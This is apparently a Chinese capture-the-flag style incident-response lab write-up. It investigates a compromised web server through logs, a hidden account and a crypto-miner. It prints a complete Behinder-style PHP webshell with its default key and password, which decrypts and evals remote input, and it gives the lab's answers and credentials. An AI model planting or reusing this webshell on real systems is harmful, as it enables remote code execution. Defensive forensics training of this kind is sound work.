知攻善防应急响应靶场练习-web

web1

前景需要：
小李在值守的过程中，发现有[CPU](https://so.csdn.net/so/search?q=CPU&spm=1001.2101.3001.7020)占用飙升，出于胆子小，就立刻将服务器关机，这是他的服务器系统，请你找出以下内容，并作为通关条件：

1.攻击者的shell密码
2.攻击者的IP地址
3.攻击者的隐藏账户名称
4.攻击者挖矿程序的矿池域名

用户：administrator
密码：Zgsf@admin.com

shell密码

先去查看apache日志

发现后门木马

查看shell.php，md5+aes，默认密码是rebeyond

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond
 $_SESSION['k']=$key;
 session_write_close();
 $post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
 {
  $t="base64_"."decode";
  $post=$t($post."");

for($i=0;$i<strlen($post);$i++) {
        $post[$i] = $post[$i]^$key[$i+1&15]; 
       }
 }
else
 {
  $post=openssl_decrypt($post, "AES128", $key);
 }
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
class C{publicfunction __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

得到shell密码：rebeyond

攻击者的ip

1	192.168.126.1 - - [26/Feb/2024:22:46:23 +0800] "GET /content/plugins/tips/shell.php HTTP/1.1" 200 -

由日志可的，192.168.126.1

隐藏账户名称

在用户目录下即可看到，hack168$

也可以在注册表中看

矿池域名

这个需要找到恶意文件，然后去查看他的源码

在hacker用户桌面发现一个Kuang.exe,本来就是虚拟机打开的，无所谓，运行看一下，千万别在本机运行

运行之后发现系统直接崩了，cpu拉满了，可以确定这是恶意文件

云沙箱分析不出来矿池域名，但可以确定这个是python编译的exe文件

PyInstaller 提取器：

python pyinstxtractor.py file

https://github.com/extremecoders-re/pyinstxtractor

拿到pyc文件，还需要用在线网站反编译一下

拿到源码

矿池域名：wakuang.zhigongshanfang.top

答案

1.rebeyond
2.192.168.126.1
3.hack168$
4.wakuang.zhigongshanfang.top

web2

前景需要：小李在某单位驻场值守，深夜12点，甲方已经回家了，小李刚偷偷摸鱼后，发现安全设备有告警，于是立刻停掉了机器开始排查。这是他的服务器系统，请你找出以下内容，并作为通关条件：
1.攻击者的IP地址（两个）？
2.攻击者的webshell文件名？
3.攻击者的webshell密码？
4.攻击者的伪QQ号？
5.攻击者的伪服务器IP地址？
6.攻击者的服务器端口？
7.攻击者是如何入侵的（选择题）？
8.攻击者的隐藏用户名？

相关账户密码
用户:administrator
密码:Zgsf@qq.com